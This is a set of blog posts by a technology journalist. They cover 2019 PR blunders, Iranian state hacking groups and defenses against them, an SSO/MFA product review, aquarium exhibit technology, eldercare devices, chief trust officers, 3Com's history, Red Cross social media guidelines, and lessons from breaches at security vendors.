FIR B2B podcast #132: Worst PR Nightmares of 2019

This week we take a moment to reflect on the past year’s major PR blunders. Thanks to the folks at Crain’s Chicago Business, we have five doozies to relive with you. They run the gamut from Hallmark’s lesbian bridal spot to Sallie Mae’s Hawaiian junket to the various missteps of Boeing’s now ex-CEO.  All have a few things in common:

  • The companies were culturally tone-deaf, whether to gender, racial, or other sensitive topics. Being woke isn’t just a fixed state of mind but a commitment to keep up with the cultural norms and mores and memes in this diverse world.
  • They failed to talk. The first hours after a crisis are critical and require a response — even if it is “We are working on a response and will get back to you.” Crickets will just inflame passions and create the impression that the business fails to understand its mistakes. “An organization is more likely to survive a crisis with its reputation intact if it immediately speaks for itself rather than allowing others to speculate about its motives and behavior,” Crain’s wrote.
  • They reinforced stereotypes. The Peloton ad would have worked if it had showed the woman gifting her husband, not the other way around. Why not run these ideas by impartial third parties who can identify the land mines? Hire a couple of journalists to poke holes at your message.
  • The companies waffled in response. Hallmark first pulled then reinstated its bridal TV spot. The ad was bold and progressive. Why not stand your ground instead of yielding to criticism that you know is coming?
  • Don’t be Facebook. We have beaten up repeatedly on the social network over the past year (#117 on alternatives  and #102 on how to fix some of their most egregious flaws).  Crain’s gives Facebook a dishonorable mention for stating that it won’t vet political campaigns ads.

You can listen to our podcast here:

A field guide to Iran’s hacking groups

Iran has been in the news alot lately. And there have been some excellent analyses of the various hacking groups that are sponsored by the Iranian state government. Most of us know that Iran has hacked numerous businesses over the years, including numerous banks, the Bowman Dam in New York in 2013, the Las Vegas Sands hotel in 2014, various universities and government agencies and even UNICEF. When you review all the data, you begin to see the extent of its activities. It is hard to keep all the group names distinct, what with names like Static Kitten, Charming Kitten, Clever Kitten and Flying Kitten. (This summary from Security Boulevard is a good place to start and has links to all the various felines.) Check Point has found 35 different weekly victims, and their latest analysis shows that 17% of them are Americans. Half of the overall targets are government agencies and financial companies.

To get a more detailed analysis of the various groups, Cyberint Research has published this 30-page document that describes the tactics, techniques and procedures used by ten such groups, matching them to the MITRE ATT&CK threat and group IDs. The group IDs are useful because different security researchers use different descriptive names (the Kitten ones come from CrowdStrike, for example).

What comes out of reading this document is pretty depressing, because the scale of Iran’s efforts is enormous. They are a very determined adversary, and they have taken aim at just about everyone over the past decade. Part of the problem is that there are many private hackers who are taking credit for some of the attacks, such as the recent defacement of the Federal Depository Library Program, although “hacker culture in Iran is gradually being forced into submission by the regime through increasingly controlled infrastructure and internet laws, and recruitment to state-sponsored cyber warfare groups,” according to a report from Intsights.

And a recent news report in the Jerusalem Post says that Iranian hacking is getting increasingly more sophisticated and broadening their targets  The story cites two former Israeli government cyber agents that claim Iran is now using Chinese hacking tools in their attacks, which can be useful if Iran wants to confuse the attack origins. According to these sources, Israel gets more than 8M daily total cyber attacks.

To add insult to injury, other attackers are leveraging these threats by using them as a phishing lure, sending a message that pretends to be from Microsoft and asking you to login with your credentials. (A word to the wise: don’t.)

The US National Cyber Awareness System through CERT issued this alert last week. They recommend that you have your incident response plan in order and have the key roles delineated and rehearsed so you can stem any potential losses. Lotem Finkelstein, head of Check Point’s cyber intelligence group, agrees: “You should ensure that MFA is enabled and you brush up your incident response plans.“ Other suggestions from CERT include limiting PowerShell usage and log its activities, make sure everything is up to date on patches, and ensure that your network monitoring is doing its job.

Digital Shadows, a security consultancy, also has plenty of other practical suggestions in this blog post for improving your infosec. They recommend being able to keep lines of communication open and help your management understand the implications and risks involved. You should also have a plan for potential DDOS attacks and work through at least a tabletop exercise if not a complete fire drill to see where you are weakest.

Iran is a formidable foe. If they haven’t been on your radar before now, take a moment to review some of these documents and understand what you are up against.

Review of Thales’ SafeNet Trusted Access

Thales SafeNetTrusted Access (STA) offers a compelling blend of security solutions that bridge the MFA, SSO and access management worlds in a single, well-integrated package. STA does this by offering policy-based access controls and SSO with very strong authentication features. These policies are flexible and powerful enough that you can address a broad range of access scenarios.

Because STA covers multiple security workflows, there are several places that it can fit into your overall data protection needs. Part of your own motivation for using this product will depend on the particular direction that you are coming from. What you need STA to do will depend on what you have already purchased and where your existing security tools are weakest.

If you presently use another SSO tool, or if you aren’t happy with your existing identity management product, you might examine whether they can support or integrate with STA and use it as your principal identity provider. This will give you greater automation scope and move towards better MFA coverage for your consolidated logins.

If delivering MFA is your primary focus for purchasing a new identity product, STA should be on your short list of vendors. If you are rolling out MFA protection as part of a larger effort to secure your users and logins, then things get more interesting and the case for using STA becomes more compelling. For example, it can handle a variety of application authentication situations and be granular enough to deploy these methods for particular user collections and circumstances. Many older IAM products bolted-on their MFA methods with cumbersome or quirky integration methods or required you to purchase separate add-on products for these features. STA has had this flexibility built-in from the get-go and has a well-integrated MFA set of solutions.

If you presently use another vendor’s authentication app or have a collection of hardware tokens that you are trying to migration away from, you might want to examine whether STA’s MobilePass+ offers improvements to the user workflows that could increase MFA coverage across your application portfolio.

Thales SafeNetTrusted Access is available at this link. Pricing starts at $3.50 /user/month, which includes access management, SSO, authentication tokens and services support. A premium subscription which adds PKI MFA support is also available.

You can read my full report here. And here is my screencast video that points out the major product features:

 

Medium One-Zero: How to Totally Secure Your Smartphone

The more we use our smartphones, the more we open ourselves up to the possibility that the data stored on them will be hacked. The bad guys are getting better and better at finding ways into our phones through a combination of subtle malware and exploits. I review some of the more recent news stories about cell phone security, which should be enough to worry even the least paranoid among us. Then I describe the loss of privacy and the how hackers can gain access to our accounts through these exploits. Finally, I provide a few practical suggestions on how you can be more vigilant and increase your infosec posture. You can read the article on Medium’s OneZero site.

How theme park technologies have helped museums: a case study of the new St. Louis Aquarium

I am a big patron of museums. I go to many of them and try to fit in a visit whenever I am out of town. But what I have seen lately is how they have begun to use the same technologies that entertainment companies have been perfecting for movies and theme park rides, all in the interest of capturing more visitors and increasing visitor engagement. I think this a positive development, and this blog explains its evolution and why it is welcomed.

I have written about this trend before: once for the NY Times when I visited the Lincoln museum in Springfield Ill. back in 2008, and once for HPE’s blog posted two years ago. In those posts, I talk about how the best museum designers combine exhibits involving non-visual senses (not just reading some text plastered on the wall) and using technologies such as RFID and touchscreens to personalize the visit. (I’ll talk about these in a moment.)

You might call this when museums become theme parks. And while this isn’t quite as dire as this might sound, it does show how hard museums have to work to gain notice in this Snapchat world where attentions can shift in a matter of seconds. It also shows how the technology developed for the theme parks (including higher-definition video, complex theatrical control systems and the like) can be deployed in ways to improve learning and make the visits more memorable. These technologies can also help those of us that want to learn more and take a deeper dive into what is being shown in the museum.

I got a preview of the latest example with a new aquarium here in St. Louis that will open next week. The aquarium is part of a major redevelopment of our Union Station, a building that hasn’t seen any scheduled passenger service for many decades and is more than 100 years old. When I moved here more than ten years ago, the building contained a shop-worn mall that had lost its luster. Then a few years ago it began to be redeveloped by its current owner, Lodging Hospitality Management (LHM). That company continued its adaptive reuse with various entertainment improvements: besides the aquarium, there is a Ferris Wheel, new restaurants and an indoor ropes course.

But just saying we have a new aquarium isn’t really doing the place justice. It is probably the most technologically advanced aquarium that I have seen. Its use of technology is done so elegantly that you may not really notice it as you drag your brood through the place, looking at the tanks and the sea life. A preview of what you can see in its tanks is linked here. (There is also this story on a local TV station here.) Let’s stop in and see what is going on.

First is using the latest high-def video in interesting ways. When you first enter the complex, you are in a soaring grand lobby that appears to be sitting at the bottom of a tank, as waves of water wash over you. The wall you are facing has loads of gears and a huge analog clock face, which plays off on that you are located inside a former train station. You then realize that you are looking at various video screens, and some very nice ones at that. The screens are delivering twice 4k resolution. That grabbed my attention. According to Andrew Schumacher, the main architectural designer at PGAV Destinations that lead the project, they spec’ed out the lobby ceiling with projection video three years ago when they first began. “But then LED technology became a better solution, so we made that change.” It is certainly stunning.

PGAV Destinations is based in St. Louis and has been designing various attractions for more than 50 years. They have created exhibits for the Atlanta Aquarium, including building a new shark tank for them. They were excited about creating an entire aquarium from scratch, and were challenged by LHM to incorporate technology in interesting pedagogical ways that combined both “high tech and high touch,” according to Schumacher. I think they have succeeded quite well. When you think about their design challenge, they have to meet three different goals:

  • First, the animal or fish has to be comfortable in its habitat.
  • Second, the keepers have to be able to do their jobs, feed the critters, and maintain the tanks.
  • Finally, the guests have to have something interesting to see.

Balancing these three goals isn’t easy, and given that each animal is unique and that the aquarium has more than 13,000 different “residents,” that adds to the complexity. And the trick is making sure that in the future we still have all of these residents alive and well.

But it isn’t just having tech for tech’s sake. The designers wanted to “bring the visitor into the story, something we learned from Disney and other theme parks,” said Ben Davis, the CTO of MoonDog Animation Studio in Charleston SC. This means you have to craft a compelling story from the moment you purchase your ticket to when you inevitably exit through the gift shop. I think they have succeeded. MoonDog designed the stories that are used throughout the aquarium, something they have done for other cultural institutions. “We were trying to get the aquarium to talk back to you, to bring you an emotional experience and keep you in a state of awe,” he told me. I agree completely. This isn’t your grandfather’s fish tank.

Once we leave the lobby, we then move into what appears to be a mockup of a train car. Instead of the windows on the sides and ceiling of the car, you have additional video screens that take you on the start of your journey to the wonders of the rivers and oceans around you. Once you exit the train car, there are six different major galleries to explore that are defined by various ecosystems, including one that covers the nearby confluence of the Missouri and Mississippi Rivers.

Smart Monkey’s ISAAC show control system runs the screens in this and other areas at the aquarium. You can see this company’s work to operate the media installations such as at the Bradley LAX international terminal (shown here) and at numerous museums around the world, including the Shedd Aquarium in Chicago, the US Mint in Philadelphia, and exhibits at the Kennedy Space Center. This makes it easy to coordinate and operate all the various digital media and to program some very sophisticated special effects.

The ISAAC system at the aquarium is running seven VMs and contains all the digital media assets for the place, along with housing a scheduling system and various databases and workspaces. The key, as explained to me by their director of technology Mitch Schuh, is to enable the graphic and exhibit designers to have tools to make it easier to realize their vision, without having to worry about the underlying networks, servers and other infrastructure. The system also has an active-active failover, in case one system goes down. All of this can be managed remotely via a web portal too, so the aquarium systems can be operated anywhere in the world. “I can think of several cases during the construction of the exhibits where we were able to make quick decisions and adjust show runtimes and make other changes on the fly,” said Schuh. “These would have taken a lot more time and effort without Isaac.”

Besides all the HD TVs, there are also touchscreen kiosks. They are popping up at many museums. The aquarium has them sprinkled throughout its galleries, and they are set in an attractive steampunk-like setup. Why steampunk? This is because the designers wanted to evoke what early 1900s-era train travel was like, paying homage to the early days of the station. These screens can provide a simulated 3D display of the sea life you are looking at, along with a map showing you where you are located and other data such as diet and habitat that can help amplify your visit and provide more context about what you are seeing in the tanks. They are also used to support a personalized game designed for kids visiting the museum. (More on that in a moment.)

Second is its use of music and sound and lighting effects. In my walkthrough I met Michael Gleason, the head composer, who told me that he had written more than 75 minutes of music that will play in different galleries and for different situations. That is more than many feature films have and is indicative of the sensory experience they are aiming towards. But it isn’t just the sound effects, but its combination with theatrical lighting too. I first saw this in the Lincoln museum, but the lighting is used in our aquarium in more clever ways to amplify the music you are hearing and what is swimming in the tanks in front of you. These digital assets are part of what the Isaac show control systems are managing.

Next is animation along with virtual/augmented reality. One of the exhibits is the three otters that live there, and of course they are named Thatcher, Sawyer and Finn. There is another animated one called Tommy that you can interact with is manipulated via computers. This was created by the folks at Groove Jones.  Tommy is next to the same gallery where you can see the real ones swimming around. The human operator has cameras to judge the audience response and answer their live questions. Like the Wizard of Oz, the operator is manipulating the controls in a hidden booth. There is also a sandbar touch tank that has a layer of projected video on it, making it more enticing and interactive for the visitors. The goal here is to engage the visitor and have them literally get their hands wet exploring the life aquatic.

Personalization is also a big plus. When I visited the Chopin museum in Warsaw, we got a RFID tag that would allow us to hear the content in our language of choice, along with further personalization depending on our age and musical sophistication. Museums are getting smarter about making these visits more personal. A good example of this can be found at Atlanta’s College Football Hall of Fame. When you purchase your ticket, you get a lanyard with an RFID chip that is set to a particular team and player. As you move around the museum, you see statistics that are filtered which are relevant to that player. At the aquarium, children get RFID cards that are age-matched and allow them to participate in a scavenger hunt and knowledge quizzes with results that get posted to their profiles.

Sometimes the personalization doesn’t have to be too high-tech: if you visit one of the Titanic Museums in either Branson or Vegas you will be given a random paper “passport” to allow you to assume the identity of one of the passengers. You get to find out where that passenger lived aboard the ship and whether they survived the accident.

We have come a long way since museums started using AcoustiGuide technology to play recordings of their curators explain their collections to us. MoonDog’s Davis sees one way to make this tech more location-sensitive, to further increase personalization and as a way that it could be driven by an ISAAC or other show-control system. He sees that movie producers and museum curators are converging, so that visitors can create their own stories with their visits.

There is a fine line between putting so much sensory information in a museum that it can overwhelm and defeat its purpose of improving the visitor’s experience. You do want to leave time for visitors to think about what they are seeing and hearing and feeling. While I am excited to see these other, non-visual, elements appear, I do understand that you need to integrate them carefully and ensure that you aren’t becoming a theme park version of the museum. I welcome your own thoughts about this. Please share other examples of museums or places that you have been that have resonated with you in the comments.

How tech can help eldercare quality of life

If you are supporting an elderly member of your family, you might be interested in a collection of home tech devices that can help extend their ability to live more independently. We all need help as we get older, and I write this column based on the experience of my family and caring for my 95 year-old mother-in-law.

She has been living independently for the past 18 months using these three technologies:

  • Hero automated pill dispenser (It now costs at least $30 per month with a $100 initial purchase and 12-month commitment. There are other plans that cost more and provide additional monitoring and support.)
  • BlipCare BP blood pressure monitor (We bought it on Amazon for $159, although it currently is no longer being sold there.)
  • And an Amazon Alexa Show 5 ($89) or 8 (for $129) (These are list prices and are discounted heavily for various promotions.)

The three devices allow us to ensure we can reliably dispense her meds, take her blood pressure, and talk to her when we aren’t able to visit. I’ll explain the limitations and decisions behind each piece of technology. When we brought all this gear into the facility, the medical staff was impressed and also unfamiliar with each of them, which motivated my purpose in writing this column. Note that my mother-in-law lives independently in an eldercare facility, although step-up care is available in other parts of her building. This is a common arrangement.

Each device works with its own smartphone app to setup, but not to use: that is an important distinction as my mother-in-law doesn’t have a smartphone. They also all require decent Wifi service in her room, which could be an issue in some facilities. (This means that you should test the signal strength in your family member’s room ahead of time.) All three units sit nestled together on her desk, which is also important, and I will get to why in a moment.

The Alexa Show is a voice-activated home hub device, similar to what Google and Apple sell with one difference: it has a very simple video conferencing setup. The video screen (either five or eight inches on the diagonal) is critical, because it allows us to “drop in” on her and have a video chat, see what she is doing. This is critical during the pill-taking and blood pressure processes, which is why all three devices are near each other on her desk, and also used to contact her in case we can’t reach her on her cell phone. And it helps that the Alexa show is very simple to use. You do need a smartphone app to make the call. A second benefit of the Alexa-brand of devices is that they have a better event notification process. That is useful for verbal reminders of daily events. Other home hubs, such as from Apple or Google, aren’t as convenient or as capable in this regard.  (Also, Facebook has its Portal, but I haven’t tried it out yet.) BTW, we have had mixed success with her giving Alexa voice commands. You might want to try out one of these devices in your own home with your elderly family member and see how it goes.

The Blipcare device is a bit quirky to setup. It uses its own web server and has alarmingly lax security, but what is nice is that you don’t need anything else to record her blood pressure once you get it working. Results are automatically posted within a few minutes to a special dashboard webpage that family members can check periodically and also share with doctors. If you have two family members to care for, it can track their stats separately.

Finally, the Hero device is used to dispense her pills. It needs to be periodically loaded with them, of course, but it is basically very simple to use: my mother-in-law just presses a button, and the pills drop down into a cup, similar to how a soda machine dispenses its product.  You set up a schedule and which pills get dispensed when.

The notion of having these three devices is to postpone having nursing care or other options for my mother-in-law. While these devices aren’t cheap, using them for several months can have a big payback given what the step-up nursing care charges would be. And they also offer a sense of security for our family. While for our situation the devices involve us in her care, your own family situation might not make this possible or desirable. And like any home tech, you have to be prepared to do some tech support to handle problems.

BTW, I have been using a different device to monitor my own blood pressure, the Qardio Arm ($99). It requires a bluetooth connection to a smartphone to post its results and is somewhat difficult for an elderly person to put over their arm and get it aligned in just the right spot for accurate measurements. I have been using one for many years. And although have had to replace two of the devices, the company quite willingly sent me these replacements at no charge.

Feel free to share your own eldercare tech solutions here.

RSA blog: Why you need a chief trust officer

Lately it seems like trust is in short supply with tech-oriented businesses. It certainly doesn’t help that there have been a recent series of major breaches among security tech vendors. And the discussions about various social networks accepting political advertising haven’t exactly helped matters either. We could be witnessing a crisis of confidence in our industry, and CISOs may be forced to join the front lines of this fight.

One way to get ahead of the issue might be to anoint a Chief Trust Officer. The genesis of the title is to recognize that the role of the CISO is evolving. Corporations need a manager focused less on talking about technical threats and more about engendering trust in the business’ systems. The CTrO, as it is abbreviated, should assure stakeholders that they have the right set of tools and systems in place.

This isn’t exactly a new idea: Tom Patterson (seen here) and Bob West were appointed in that position at Unisys and CipherCloud respectively more than five years ago, and Bill Burns had held his position at Informatica for more than three years. Burns was originally their CISO and given the job to increase transparency and improve overall security and communications. Still, the title hasn’t exactly caught on: contemporary searches on job boards such as Glassdoor and Indeed find few open positions advertised. Perhaps finding a CTrO is more of an internal promotion than hiring from outside the organization. It is interesting that all the instances cited above are from the tech universe. Does that say we in IT are quicker to recognize the problem, or just that we have given it lip service?

Tom Patterson echoes a phrase that was often used by Ronald Reagan: “trust but verify.” It is a good maxim for any CTrO to keep in mind.

I spoke to Drummond Reed, who has been for three years now an actual CTrO for the security startup Evernym. “We choose that title very consciously because many companies already have Chief Security Officers, Chief Identity Officers and Chief Privacy Officers.” But at the core of all three titles is “to build and support trust. For a company like ours, which is in the business of helping businesses and individuals achieve trust through self-sovereign identity and verifiable digital credentials, it made sense to consolidate them all into a Chief Trust Officer.”

Speaking to my comment about paying lip service, Reed makes an important point: the title can’t be just an empty promise, but needs to carry some actual authority, and must be at a level that can rise above just another technology manager. The CTrO needs to understand the nature of the business and legal rules and policies that a company will follow to achieve trust with its customers, partners, employees, and other stakeholders. It is more about “elevating the importance of identity, security, and privacy within the context of an enterprise whose business really depends on trust,” advises Reed.

Trust is something that RSA’s President Rohit Ghai speaks about often. Corporations should “enable trust; not eradicate threats. Enable digital wellness; not eradicate digital illness.” I think this is also a good thing for CTrO’s to keep in mind as they go about their daily work lives. Ghai talks about trust as the inverse of risk: “we can enhance trust by delivering value and reducing risk,” and by that he means not just managing new digital risks, but all kinds of risks.

In addition to hiring a CTrO, perhaps it is time we also focus more on enabling and promoting trust. For that I have a suggestion: let’s start treating digital trust as a non-renewable resource. Just like the energy conservationists promote moving to more renewable energy sources, we have to do the same with promoting better trust-maintaining technologies. These include better authentication, better red team defensive strategies, and better network governance. You have seen me write about these topics in other columns over the past couple of years, but perhaps they are more compelling in this context.

Lessons tech startups can learn from the history of 3Com

Many tech startups of today just assume that the Internet is ubiquitous, that bandwidth is plentiful, and that everyone can connect anywhere and at anytime. Well, that wasn’t always the case, and back in the day when I was a young IT professional, we didn’t have the Internet. We didn’t have Wifi. And we just barely had PCs on our desks.

Then a company by the name of 3Com came into the picture, and our world changed. Never heard of them? They were the early innovator of Ethernet computer networking, and back then you had to use wires to connect computers together and special circuit boards that had to be installed inside a computer, not to mention special software to run it all. Those early networks required skills to get all of this setup properly. 3Com figured this all out, and the company existed for 40 years before eventually its assets were sold to HP for $2.7B a few years ago. They had a good run for the first ten years of their corporate life until they started making major mistakes in the middle 1990s.

If you are involved in a tech startup, there are lots of business books that you can read. But Jeff Chase’s 3Com chronicle will be one that can help guide you. He takes us through their founding, their success, their collapse, and their eventual end with a lot of insider information, which isn’t surprising given that he worked in their corporate audit department for nearly a decade. What is also important is how he describes the many lessons to be learned from this history of the company, how it took advantage of the early networking technologies and then squandered this lead.

First, let’s look at their major successes:

  1. A key recipe for any business’ success is whether or not teams have an emotional commitment towards their managers. This is something that 3Com had in spades and was noted for its staff loyalty. One reason for this is the company had a very open and transparent culture, sharing weekly results at all-hands meetings every Friday, even numbers that were generally only known by top executives. Contrast this with many tech companies that are very secretive today.
  2. Understand your go-to-market and channel strategy. One 3COM CEO, Bill Krause, put it this way: “All our VCs thoughts that if you were going to sell networks it had to be done through their IT departments. We were determined to sell our products through computer stores because they were easy to install and use. That turned out to be successful.” That was an understatement. Back in those early days, this was ground-breaking.
  3. 3Com didn’t only develop and commercialize Ethernet products, but it also developed new distribution methods and innovative manufacturing processes to make these products. It kept up – for a time – in advances in network speeds and contributed to the open standards that made Ethernet the only networking technology to survive to the present day.
  4. They understood innovation, at least for their first decade. They had the patience to trust their instincts and initially took the right bets to stay ahead on Ethernet innovation, with the caveats mentioned below. They also understood that they had had sticky products that were put together well, and drove loyalty in their existing customer base.
  5. 3Com was one of the first companies to go global in a meaningful way, hiring offshore R&D talent and focusing on partnerships with Chinese companies long before either of these became fashionable. They coined a term for the later, “China Out,” which enabled them to enter the Chinese market, license their technology to a leading Chinese networking company, and re-energize the company in its later years. How this happened is worth reading these chapters alone.

But here are their major blunders:

  1. 3Com blew a major decision to upgrade to Fast Ethernet and gave away that market to Cisco. The two companies had big differences in their focus on sales, marketing and engineering. 3Com failed in the Fast Ethernet market, was late to recognize its role and never recaptured its lead as an innovator that it had with its early Ethernet products. Part of the problem here was that they focused on their most profitable products, ignoring potential game-changing disruptive new technologies. But part is that they rested on their laurels with their Ethernet business and stopped innovating, losing ground to others.
  2. They didn’t carefully plan their acquisitions. Early on, 3Com had a few successful acquisitions based on complementary strategies and product lines. But then in the middle 1990s they blew it with the US Robotics/Palm purchase. 3Com bought the modem company for $7.3B, eventually spinning off the Palm subsidiary for an IPO that generated $1B in cash profits. But 3Com was never the same after this acquisition, and it led towards their eventual downfall.
  3. It lost its vision, misunderstanding its customers and what their priorities were. They became tactical, not strategic. They forgot about their customers which were the major banks and largest enterprises in the world, and what they purchased and how they bought their equipment. In essence, they basically exited the large enterprise market in 2000 and could only recapture this in later years with great difficulty.
  4. They had a strong CTO (Paul Sherer) but when he left the position wasn’t filled. In the book there is this delightful story about how Sherer had to come in over one weekend after he resigned and help fix a bug that no one else could quash after weeks of work.

Spend some time learning from the successes and failures of 3Com if you are working for a tech startup. You will find them instructive, and Chase’s book a worthwhile read.

How the Red Cross provides social media leadership

I have been volunteering for the past several months for the American Red Cross and I came across a series of documents, policies, and training about how they use social media that I thought I would share with you. I actually have two very different volunteer jobs with them. First, I work for our local chapter to drive blood to various hospital blood banks. And I work for the national office in DC to help produce a monthly webinar that is attended by hundreds of volunteers and employees involved in their disaster relief efforts. Note that these thoughts are my own, and not necessarily that of the Red Cross.

One thing that I am continually impressed with the Red Cross is how well it partitions and structures the workflows of its volunteers. Even if you volunteer for a relatively low-level position, such as a front desk receptionist, there are manuals that guide what you do and when you do it. This isn’t surprising, given how many of us volunteers there are and how many volunteers are in key leadership roles directing its critical operations. Think about that for a moment: many non-profits give their volunteers the scut work (file these papers that have been lying around here for months). The Red Cross does the opposite, and it is often hard to distinguish between volunteers and staffers when you first meet someone.

A good case in point is my wife, who volunteered in their Santa Monica office years ago after the Katrina floods. Within weeks she was attending staff meetings and eventually she was hired as the chapter’s development director.

But let’s talk about social media, and my first point is the Red Cross’ social media guidelines, which take up all of a single page but have lots of good advice. I thought I would share some of them with you as an example of what you should create for your own business. During my last webinar, Megan Weiler, the senior director of Social Media at their DC HQ gave a presentation on these guidelines and pointed out their six core principles of being a good social citizen:

  • Be human, meaning “be your friendly self and use good manners” – too often we tend to post from frustration or to try to right a wrong.
  • Be engaging, find others of similar interests and encourage thoughtful discussions.
  • Be accurate, make sure news items are verified and give credit for the content you got from someone or somewhere else.
  • Be honest, meaning if you mess up, fess up and do so quickly.
  • Be considerate, don’t start flame wars. If you have to disagree with someone, do it politely. Also, stay focused on the topic at hand.
  • Be safe. Protect your privacy and “be mindful of what you share online.”

These are all great things to keep in mind when you create your own social media posts for your company. What I like about this list is that it gives you the responsibility and boundaries to be successful at delivering messages using social media. Having written and spoken about these topics for more than a decade, I found it a very refreshing take. Too often corporations are heavy-handed about directing their employees’ use of social media. That heavy hand results in social media misfires or sock puppetry that doesn’t serve anyone well. (Take as a case in point of the Twitter account of a certain former White House staffer earlier this month as an example.)

Some corporations were early advocates of social media like Dell, who subsequently put together a central social media command center at its corporate offices outside of Austin. That may work well for them (I wrote this analysis of Dell’s effort back in 2011) and indeed the Red Cross has its own digital operations nerve center to help with its disaster relief efforts. But this is just one aspect of what the Red Cross does and managing their gigantic global volunteer staff at the Red Cross has some other circumstances and wider implications. They actually understand that social media engagement is a critical component of their operational DNA and sharing a volunteer’s personal story is part of their mission.

You might wonder why I am driving blood around town. My reason was simple: it was an extension of the many years where I donated blood and I liked being more involved and getting to understand their infrastructure to bring blood units to those who need them. It isn’t intellectually challenging – other than keeping track of where in each hospital the blood labs are located – but it deepens my involvement. (Did you notice how I just shared my personal story here?) BTW, for those of you that donate blood, thanks for helping out!

Finally, the Red Cross has a half-hour online training course on social media basics that are only available to volunteers. The class walks you through what social listening is all about and how to get you more engaged in participating in social media as a Red Crosser. The class also makes a distinction between a volunteer implying they are running an official Red Cross social media account, versus their saying that they only represent themselves. That is an important distinction.

The class goes into further details:

  • If you post anything about the Red Cross, make sure you disclose your role and use your real name. Disclose any vested self-interest and write about your own expertise.
  • Respect your dignity, privacy and confidences. Be sensitive to the community you are serving, be cautious about sharing information before it is vetted.
  • “Remember if you are online, you are on the record.” This is probably the most important aspect of social media that many of us tend to forget.
  • Understand that your personal social media accounts are your identity. You should certainly include your corporate affiliation in your online bios but shouldn’t construct your Twitter handle around them. For example, create a handle such as @dstrom, rather than @redCrossStrom. Maintain the balance of what is personal and what is professional. Some companies want you to operate their social media accounts – while that could work in certain circumstances, the Red Cross wants you to be you.

How to prevent a data breach, lessons learned from the infosec vendors themselves

This fall there have been data breaches at the internal networks of several major security vendors. I had two initial thoughts when I first started hearing about these breaches: First, if the infosec vendors can’t keep their houses in order, how can ordinary individuals or non-tech companies stand a chance? And then I thought it would be useful to examine these breaches as powerful lessons to be avoided by the rest of us. You see, understanding the actual mechanics of what happened during the average breach isn’t usually well documented. Even the most transparent businesses with their breach notifications don’t really get down into the weeds. I studied these breaches and have come away with some recommendations for your own infosec practices.

The breaches are:

You will notice a few common trends from these breaches. First, the delay in identifying the breach, and then notifying customers.  It took NordVPN five weeks before they notified by their datacenter provider, and they found out the attack was part of an attack on their other VPN vendor customers. “The datacenter deleted the user accounts that the intruder had exploited rather than notify us.”  It took Avast months to identify their breach. Initially, IT staffers dismissed the unauthorized access as a false positive and ignored the logged entry. Months later it was re-examined and determined to be malicious. It took two months for Trend to track down exactly what happened before the employee was identified and then terminated.

Finally, about 4,000 users on a support forum have notified by ZoneAlarm about a data breach. Data compromised includes names, email addresses, hashed passwords, and birthdates. The issue was outdated forum software code that wasn’t patched to current versions. Their breach happened at least several weeks before being noticed and emails were sent out to affected users within 24 hours of when they figured the situation out.

These delays are an issue for anyone. Remember, the EU, through GDPR, gives companies 72 hours to notify regulators. These regulators have issued some pretty big fines for those companies who don’t meet this deadline, such as British Airways.

Second is a question of relative transparency. Most of the vendors were very transparent about what happened and when. You’ll notice that for three out of the four situations I have linked to the actual vendor’s blog posts that describe the breach and what they have done about it. The sole exception is ZoneAlarm, which has not posted any details publicly. The company is owned by Check Point, and while they have been very forthcoming with emails to reporters that is still not the same as posting something online for the world to see.

Third is the issue that insider threats are real. Employees will always be the weakest link in any security strategy. With Trend, customer data (including telephone numbers but no payment data) was divulged by a rogue employee who sold the data from 68,000 customers in a support database to a criminal third party. This can happen to anyone, but you should contemplate how to make a leak such as this more difficult.

Finally, recovery, remediation and repair aren’t easy, even for the tech vendors that know what they are doing (at least most of the time). Part of the problem is first figuring out what actual harm was done, what the intruders did and what gear has to be replaced. Avast’s blog post is the most instructive of the three and worth reading carefully. They have embarked on a major infrastructure replacement, as their CISO told me in a separate interview here. For example, they found that some of their TLS keys were obtained but not used. Avast then  revoked and reissued various encryption certificates and pushed out updates of its various software products to ensure that they weren’t polluted or compromised by the attackers. Both Avast and NordVPN also launched massive internal audits to track what happened and to ensure that no other parts of their computing infrastructure were affected.

But part of the problem is that our computing infrastructures have become extremely complex. Even our own personal computer applications are impossible to navigate (just try setting up your Facebook privacy options in a single sitting). How many apps does the average person use these days? Can you honestly tell me that there is some cloud login that you haven’t used since 2010 that doesn’t have a breached password? Now expand that to your average small business that allows its employees to bring their personal phones to work and their company laptops home and you have a nightmare waiting to happen: all it takes is one of your kids clicking on some dodgy link on your laptop, or you downloading an app to your phone, and it is game over. And as a friend of mine who uses a Mac found out recently, a short session on an open Wifi network can infect your computer. (Macs aren’t immune, despite popular folklore.)

So I will leave you with a few words of hope. Study these breaches and use them as lessons to improve your own infosec, both corporate and personal. Treat all third-party sources of technology as if they are your own and ask these vendors and suppliers the hard questions about their security posture. Make sure your business has a solid notification plan in place and test it regularly as part of your normal disaster recovery processes. Trust nothing at face value, and if your tech suppliers don’t measure up find new ones that will. And as you have heard me say before, tighten up all your own logins with smartphone-based authentication apps and password managers, and use a VPN when you are on a public network.